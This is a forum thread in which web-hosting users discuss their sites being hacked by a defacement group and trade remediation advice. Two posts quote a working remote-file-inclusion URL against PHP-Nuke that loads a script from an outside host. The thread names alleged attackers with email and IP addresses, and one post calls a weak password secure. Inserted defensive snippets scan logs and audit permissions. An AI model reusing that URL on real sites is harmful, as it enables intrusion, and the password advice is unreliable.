My website has been hacked





andy26
Hi, my Frihost account was hacked by this person: kol3r@hotmail.de

Their IP is: 88.251.218.98

Is there anything you can do about this? He's taken over my whole site. I added him on MSN but he didn't say much apart from that Frihost has no security, so I don't think it's just my site in danger. I think this person is trying to take down Frihost.

Edit: I spoke to the person that hacked me and they unhacked me. But could the admin of this site please do something with my account's security?
ncwdavid
I don't know much about Frihost's security but I think it's mainly up to you to secure your site. Make sure your password for DirectAdmin is very secure, and that all your FTP passwords and your database passwords are secure.

If your site is driven by PHP and MySQL then it's really up to you how secure it is. Make sure you never trust anything that a user inputs into an input field or a URL they enter.
andy26
He said he got in via FTP and said no security, but all my FTPs have passwords.
Sunny
And what makes you feel like your account has been hacked? You can't log in to DirectAdmin, or your site is giving errors, or just because he told you so?

If you can't log in to DirectAdmin, try to reset your password using this link and see if it works.
andy26
The site is back now. First of all, I noticed because they hacked my forum by editing my page and left details, so I added them on MSN and asked for it back; then they took over the full thing. I believe they used this tool: http://karamanlilar.org/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=http://www.awaywiththefairies.us/a?cmd=id

Also, if you type the person's email into Google you can see other sites they have hacked. The person's email is at the top of this thread.

I suppose all I can do now is change every password I have and block the IP that this person used to gain access to my site. I know it's the person's IP because I have a stat tracker and I found it was Turkish, and if you put the guy's email into Google you can see that they're based in Turkey. So I will have to put an access block on this IP.
Sunny
You got it back using that password retrieval link?

Apart from changing passwords, also make sure that you have given the right permissions for folders and files (CHMOD).
andy26
Nope, I just simply asked them so many times that they gave me control back. I've done a bit of research and found they could have got through my forum, at least I think so. I just hope it doesn't happen again. I was worrying like crazy; I have a really bad headache now.

What do you suppose my chmod permission should be for my forum index? It's currently set to 777.
cybernie
My site has been hacked too... I can't open my forum, which is my main page.

A list of hacked sites can be found at http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,Sonvurus.oRg

Using the filter by domain, many Frihosters are affected by this attack.
FunDa
Waaaa ------ my site too

They put

hacked by KOL3R@=ilknur SONVURUS.ORG

in the www.fundazone.com/freesms page.

I checked out the page (it was a PHP page) and there were no modifications in it.
But there was some PHP code I used to track my web statistics - TraceWatch.

When I removed that code, it was fine ...

www.fundazone.com main page

Actually, on my site they attacked through my site statistics PHP tracker.

I "unhacked" it, but please, someone tell me how to close the loopholes !!!!

It seems a lot of frih.net sites were hacked !!!!
andy26
Can't we all fill out a report of what these people did and send it to their ISP to try and get them banned from the internet? I have their IP thanks to my site stats tracker. We should do something to act against these hackers. I think they got through our database passwords, so keep our FTP passwords different from our database passwords.

They sent me this page, which I think is a web tool they used to hack our SQL passwords: http://karamanlilar.org/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=http://www.awaywiththefairies.us/a?cmd=id

Edit: Should we all team up and do something about this? If so, add me on my MSN as well. We must have enough proof to get these people taken down. It's not like they're just hacking to find out the workings of a computer system; they're destroying thousands of online businesses, and your site too, so we need to do something about it. We also need to work on loopholes in our sites and server settings.
silvermesh
Just have to be more careful about the PHP scripts and mods you install on your site. If you got hacked, there was probably a security problem with the forum script or whatever it was you were using. I would contact the makers of your forum scripts.
icedrakon
I can help with security if I start to get involved in it, for anyone who wants something for defence and not for attack, because we might open a war then, which is not necessary, at least for the time being...
Marston
Create a .htaccess file, and place the following in it.
Code:
RewriteEngine On
# Block http://karamanlilar.org
Deny from 216.32.85.170
FunDa
http://www.zone-h.org/index.php?option=com_attacks&Itemid=43&filter=1
Daniel15
Firstly, change your passwords! This is most important.

Quote:
they sent me this page which i think is a web tool they used to hack our sql passwords http://karamanlilar.org/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=http://www.awaywiththefairies.us/a?cmd=id

That's a security hole in PHP-Nuke. Upgrade your PHP-Nuke installation to the latest version immediately! If this is not possible, disable access to your website until it is fixed.
These hacks are not due to lack of security on FriHost, they're due to scripts with security holes in them. For anyone using PHP-Nuke, I'd suggest to remove it immediately!
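How requests of the kind quoted above show up in a site's own access log, as an added example that is not part of the original thread: it flags any query parameter whose value is itself a remote URL, the pattern seen in the phpbb_root_path link. It assumes Apache common/combined log format; the sample log lines, the example.net host and the `inc` parameter are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache common/combined prefix: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a remote URL is what a remote-include hole consumes.
REMOTE_VALUE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, example.net host); not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2007:10:01:02 +0000] "GET /modules/Forums/admin/'
    'admin_user_ban.php?phpbb_root_path=http://files.example.net/a?cmd=id HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/May/2007:10:02:10 +0000] "GET /index.php?name=Forums'
    '&file=viewtopic&t=12 HTTP/1.1" 200 8123',
    '203.0.113.7 - - [12/May/2007:10:03:44 +0000] "GET /stats/index.php'
    '?inc=http%3A%2F%2Ffiles.example.net%2Fa HTTP/1.1" 404 210',
]

def remote_url_params(target):
    """Return [(name, value)] for query parameters whose value is a remote URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; undo double encoding too
        if REMOTE_VALUE.match(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return one finding per suspicious parameter, with the response status."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        for name, value in remote_url_params(m["target"]):
            findings.append({"ip": m["ip"], "time": m["ts"],
                             "status": int(m["status"]),
                             "path": urlsplit(m["target"]).path,
                             "param": name, "value": value})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with status 200 means the targeted script exists and answered, so check those first; legitimate redirect-style parameters will also match and need to be excluded by hand.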
icedrakon
This is the portal where the Turkish hackers came from: sonvurus.org

Site sonvurus.org


Windows Server 2003 | Microsoft-IIS/6.0 | 13-May-2007 | 67.19.6.4 | ThePlanet.com Internet Services
Linux | Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.6 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a | 30-Apr-2007 | 88.255.164.220 | Fevzicakmak Cad. No: 57 / 6 Osmangazi Bursa / TR
Linux | Apache/2.0.46 (CentOS) | 30-Mar-2007 | 91.151.84.20 | Gigabitweb Dedicated Servers Network
Windows Server 2003 | Microsoft-IIS/6.0 | 10-Mar-2007 | 74.52.114.250 | ThePlanet.com Internet Services
Linux | Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.5 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a | 25-Feb-2007 | 62.68.202.82 | Nixcon Networks Inc.
Linux | Apache | 17-Feb-2007 | 62.68.202.82 | Nixcon Networks Inc.
Windows Server 2003 | Microsoft-IIS/6.0 | 11-Feb-2007 | 62.68.199.66 | Nixcon Networks Inc.

THE TEAM IS CALLED Hacked By MephisTo


Team: | Zorbey | Delpi | Axel | Kamashira | K!Ko | Albert | |Kol3r@|
andy26
Has there been any news on the process of this report you've made?
icedrakon
I can't find their site on the net; I think the report was effective.....
I don't want to start a war. I have better things to do with my time, or I will attack when I am prepared to be invisible from counterattacks...

Try my site, it has a link to a powerful IDS... more in the future
andy26
I don't think attacking will be a very good thing, especially if it can cause wars. It's best just to report them as much as we can to make sure they get caught for their hacking.
andy26
My site has been safe for 2 weeks now since the hackers attacked. Is everyone else OK? If your Frihost website has been hacked, please post it in here. Also, any news on the hackers?
FunDa
Mine looks OK ... But not sure if the hackers opened some backdoor anywhere ...

My site is www.fundazone.com and I think some files went missing, but probably it is server 2's fault ...

Was only server 2 attacked? Maybe it was one of those hackers' scripts that is slowing server 2 down? Maybe they planted more scripts in the sites of innocent users?

I used a backup from an older date, so I guess everyone on server 2 can do that to flush out the hackers' scripts if there are any ...

Or just go through all the files and kill off anything suspicious - check your htaccess, index.php and all the default error pages for malicious code ...
krazy
Yep, make sure you use secure passwords... For example, I use passwords like this... hgf543. It is quite secure and not many people can guess that.
And I change my password regularly.
And no, that password I don't use for Frihost... or anything... made it up on the spot!
froginabox
If you need a good way to create secure passwords (like the mumbo-jumbo letters and numbers ones for DirectAdmin), try this applet:

http://www.angel.net/~nic/passwd.html

It works well for me.
m-productions
andy26 wrote:
Nope, I just simply asked them so many times that they gave me control back. I've done a bit of research and found they could have got through my forum, at least I think so. I just hope it doesn't happen again. I was worrying like crazy; I have a really bad headache now.

What do you suppose my chmod permission should be for my forum index? It's currently set to 777.

That would explain why he said no security in your FTP.. If you have it set to 777, ANYONE can write to them... I could even go and write something to your site if I wanted to now.. You should really try setting your folders to 755.
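Auditing a web root for the 777 problem discussed above, as an added example that is not part of the original thread: it lists every directory and file that any user on the server can write to and can reset them. The 755 directory mode is the one suggested in the post; the 644 file mode and the function names are assumptions of this example.

```python
import os
import stat
import sys

def world_writable(root):
    """Return sorted [(relative_path, octal_mode)] for entries writable by 'other'."""
    found = []
    # os.walk does not follow symlinked directories, so the audit stays inside root.
    for dirpath, _dirs, filenames in os.walk(root):
        candidates = [dirpath] + [os.path.join(dirpath, f) for f in filenames]
        for path in candidates:
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode bits are not what is enforced
            if st.st_mode & stat.S_IWOTH:
                mode = oct(stat.S_IMODE(st.st_mode))
                found.append((os.path.relpath(path, root), mode))
    return sorted(found)

def tighten(root, dir_mode=0o755, file_mode=0o644):
    """Reset every world-writable entry under root; return the paths changed."""
    changed = []
    for rel, _mode in world_writable(root):
        path = os.path.join(root, rel)
        # 755 for directories (from the post), 644 for files (assumed default).
        os.chmod(path, dir_mode if os.path.isdir(path) else file_mode)
        changed.append(rel)
    return changed

if __name__ == "__main__":
    # Report only; call tighten() deliberately after reviewing the list.
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, mode in world_writable(target):
        print(mode, rel)
```

Upload or cache directories that the web server must write to may stop working after `tighten()`; give those to the server's own user or group rather than returning them to 777.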